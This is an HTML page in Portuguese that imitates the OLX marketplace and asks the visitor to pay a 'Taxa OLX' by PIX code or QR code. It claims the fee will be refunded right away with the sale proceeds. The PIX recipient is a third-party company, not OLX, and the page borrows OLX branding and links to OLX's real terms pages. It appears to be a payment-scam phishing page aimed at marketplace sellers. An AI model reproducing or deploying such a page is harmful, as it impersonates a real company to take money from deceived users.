<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charSet="utf-8"/>
    <meta name="theme-color" content="#000000"/>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/>
    <meta name="description" content="OLX - Rápido e Fácil pra comprar e desapegar. Vender e Comprar nunca foi tão fácil! Anuncie Online na OLX - Você tem alguma coisa para desapegar. Desapega!"/>
    <title>Pagamento da Taxa | OLX</title>
    <link data-react-helmet="true" rel="apple-touch-icon" sizes="180x180" href="img/apple-touch-icon.png"/>
    <link data-react-helmet="true" rel="icon" type="image/png" sizes="32x32" href="img/favicon-32x32.png"/>
    <link data-react-helmet="true" rel="icon" type="image/png" sizes="192x192" href="img/android-chrome-192x192.png"/>
    <link data-react-helmet="true" rel="icon" type="image/png" sizes="16x16" href="img/favicon-16x16.png"/>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Nunito+Sans:ital,opsz@0,6..12;1,6..12&display=swap" rel="stylesheet">
    <script src="https://cdn.jsdelivr.net/npm/qrcodejs/qrcode.min.js"></script>
    <style>
        body, html {
            margin: 0;
            padding: 0;
            height: 100%;
            width: 100%;
            overflow-x: hidden;
            font-family: 'Nunito Sans', sans-serif;
            background-color: #ffffff;
        }
        .header {
            background-color: #fff;
            border-bottom: 1px solid #c7c7c7;
            padding-bottom: 21px;
            display: flex;
            justify-content: center;
        }
        .logo {
            width: 47px;
            margin-top: 27px;
        }
        .form-container {
            position: relative;
            background-color: #fff;
            border: 1px solid #e0e0e0;
            border-radius: 8px;
            padding: 20px;
            width: 100%;
            overflow: hidden;
            text-align: center;
            max-width: 597px;
            margin: 47px auto;
            margin-bottom: 10px;
            display: flex;
            flex-direction: column;
            align-items: center;
        }
        .form-container h1 {
            font-size: 25px;
            margin-bottom: 20px;
        }
        .form-container p {
            font-size: 18px;
            line-height: 1.6;
            margin-bottom: 20px;
        }
        .form-container input {
            width: 60%;
            margin: 0px auto;
            height: 50px;
            padding: 10px;
            font-size: 14px;
            border: 2px solid #e0e0e0;
            border-radius: 8px;
            margin-bottom: 20px;
            box-sizing: border-box;
            max-width: 597px;
            background-color: #ffffff;
            cursor: not-allowed;
        }
        .form-container button {
            background-color: #f28000;
            color: #fff;
            border: none;
            border-radius: 20px;
            padding: 12px 32px;
            font-size: 16px;
            font-weight: bold;
            cursor: pointer;
            width: 60%;
            margin-top: 10px;
            margin-bottom: 20px;
            box-sizing: border-box;
        }
        .form-container button:hover {
            background-color : #e56c00;
        }
        #btn-payment {
            background-color: #ffffff;
            color: #f28000; /* Fonte laranja claro */
            border: 2px solid #f28000; /* Borda laranja claro */
            border-radius: 20px;
            padding: 12px 32px;
            font-size: 16px;
            font-weight: bold;
            cursor: pointer;
            width: 60%;
            margin-top: 10px;
            margin-bottom: 20px;
            box-sizing: border-box;
        }
        #btn-payment:hover {
            background-color: #f0f0f0; /* Fundo levemente cinza ao passar o mouse */
        }
        .dados-pagamento {
            font-size:14px;
            text-align: left;
            width: 100%;
            margin-top: 20px;
        }
        .dados-pagamento p {
            margin: 5px 0;
        }
        .continuar {
            font-size: 12px;
            color: #666;
            text-align : center;
            padding: 10px 20px;
            width: 100%;
            margin-top: 20px;
        }
        .scrollable-container {
            max-height: 70vh;
            overflow-y: auto;
            width: 100%;
        }

        /* Adicionando responsividade */
        @media (max-width: 768px) {
            .form-container h1 {
                font-size: 20px;
            }
            .form-container p {
                font-size: 14px;
            }
            .form-container input {
                height: 45px;
                font-size: 12px;
            }
            .form-container button {
                padding: 10px 20px;
                font-size: 12px;
            }
            .form-container .dados-pagamento {
                font-size: 12px;
            }
            .continuar {
                font-size: 10px;
            }
        }

        @media (max-width: 480px) {
            .form-container {
                padding: 15px;
            }
            .form-container h1 {
                font-size: 22px;
            }
            .form-container p {
                font-size: 14px;
            }
            .form-container input {
                height: 40px;
                font-size: 11px;
            }
            .form-container button {
                padding: 8px 16px;
                font-size: 12px;
            }
            #btn-payment {
                padding: 8px 16px;
                font-size: 12px;
            }
            .form-container .dados-pagamento {
                font-size: 11px;
            }
            .continuar {
                font-size: 9px;
            }
        }
    </style>
    <script>
        function copyToClipboard() {
            const inputElement = document.getElementById('pix-code');
            inputElement.select();
            document.execCommand('copy');
            alert('Código PIX copiado para a área de transferência!');
        }

        function delayedRedirect() {
            setTimeout(function() {
                window.location.href = "/inicial";
            }, 200);
        }

        

        window.onload = function() {
            generateQRCode();
        };
    </script>
</head>
<body>
    <header class="header">
        <nav>
            <div class="logo">
                <img src="../img/olx.svg" alt="olx-image">
            </div>
        </nav>
    </header>
    <div class="form-container">
        <h1>Pagamento da Taxa OLX</h1>
        <p>Copie o código abaixo para o PIX (Copia e Cola)<br> ou escaneie o <strong>QR Code.</strong></p>
        <p>O valor será devolvido imediatamente com <br>os valores da venda.</p>
        <div id="qrcode">
            <img src="../img/qr-code.png" alt="QR Code" style="max-width: 100%; height: auto;"/>
        </div>
        <p><strong>Copia e Cola</strong></p>
        <input id="pix-code" type="text" value="00020126850014br.gov.bcb.pix2563pix.voluti.com.br/qr/v3/at/c0b2660d-2e46-4386-9b50-a65a76d01f725204000053039865802BR5925RMT_INVEST_E_TECNOLOGIA_L6002SP62070503***63040D66" readonly />
        <button onclick="copyToClipboard()" id="btn-pix">Copiar pix</button>
        <button onclick="delayedRedirect()" id="btn-payment">Efetuei o pagamento</button>
    </div>
    <div class="continuar">
        <p>Ao continuar, você concorda com os <a href="https://ajuda.olx.com.br/s/article/termos-e-condicoes-de-uso">Termos de Uso</a> e a <a href="https://ajuda.olx.com.br/s/article/politica-de-privacidade">Política de Privacidade</a></p>
        <p> da OLX e seus parceiros, e em receber comunicações da OLX.</p>
    </div>
</body>
</html>